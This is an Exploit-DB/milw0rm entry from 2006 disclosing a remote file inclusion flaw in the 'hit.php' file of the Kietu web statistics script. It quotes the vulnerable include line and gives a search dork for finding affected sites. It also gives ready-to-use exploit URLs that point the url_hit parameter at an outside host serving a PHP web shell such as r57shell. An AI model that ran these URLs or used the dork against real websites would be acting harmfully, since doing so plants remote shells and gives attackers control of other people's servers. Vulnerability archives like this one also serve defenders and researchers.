Kietu? < 4.0.0b2 - 'hit.php' Remote File Inclusion

EDB-ID:

2438

CVE:

N/A


Author:

D_7J

Type:

webapps


Platform:

PHP

Date:

2006-09-26


#==============================================================================================
#Kietu? <= v4.0.0b2z (url_hit) Remote File Inclusion Exploit
#===============================================================================================
#                                                                      
#Critical Level : Dangerous                                            
#                                                                      
#Download from : http://www.comscripts.com/jump.php?action=script&id=958
#                                                                      
#Version : 4.0.0b2                                            
#                                                        
#================================================================================================
#
#Dork : "Kieto?"
#
#================================================================================================
#Bug in : hit.php
#
#Vlu Code :
#--------------------------------
#
# 	include_once $url_hit.'class/kdetect.class.php';
#
#	example:http://www.kietu.net/files/kietuv4/hit.php?url_hit=http://d4wood.by.ru/r57shell.php?
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/hit.php?url_hit=http://sheller.com?
#
#================================================================================================
#Discoverd By : D_7J
#
#Conatact : D_7J[at]yahoo[dot]com & D_7J[at]Deltahacking[dot]net
#
#Special Thx To : Str0ke
#Greetz:DeltahackingSecurityTEAM,Ashiyane,IHS,Simorgh,Shabgard,ICH,
==================================================================================================

# milw0rm.com [2006-09-26]